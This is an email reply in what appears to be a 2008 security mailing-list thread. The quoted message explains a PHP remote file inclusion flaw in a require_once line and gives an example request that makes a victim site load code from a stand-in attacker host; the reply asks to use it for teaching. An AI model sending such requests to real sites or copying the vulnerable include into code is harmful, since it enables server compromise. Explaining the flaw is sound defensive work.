On Tue, Aug 12, 2008 at 12:28:08PM -0400, sbeam wrote: > On Tuesday 12 August 2008 12:18, Rainer Duffner wrote: > > (I think it requires both register_globals and allow_url_fopen to be on, > > but I'm not sure if you can't get it to work with only allow_url_fopen....) > > as I just found out, it can, as long as the PHP developer was even more naive > than usual. The offending line was: > > require_once($_SERVER['DOCUMENT_ROOT']."/db.inc.php"); > > then a request like: > > http://victim.com/index.php?_SERVER[DOCUMENT_ROOT]=http://badguysit > e.es/bot.txt > > will do a fopen() for "http://badguysite.es/bot.txt/db.inc.php", which is good > enough. > > And yeah this works with register_globals off, which surprised me. And also > surprised that mod_security has no problem with that URL. I am going to raise > the issue with them. Hi Sam, Nice job tracking that down, and evenm nicer, explaining it with an example even. If you don't mind I would like to use it as a real world example for a class I'm teaching? I will remove all the identifying information first of course. Thanks, Jeff Kinz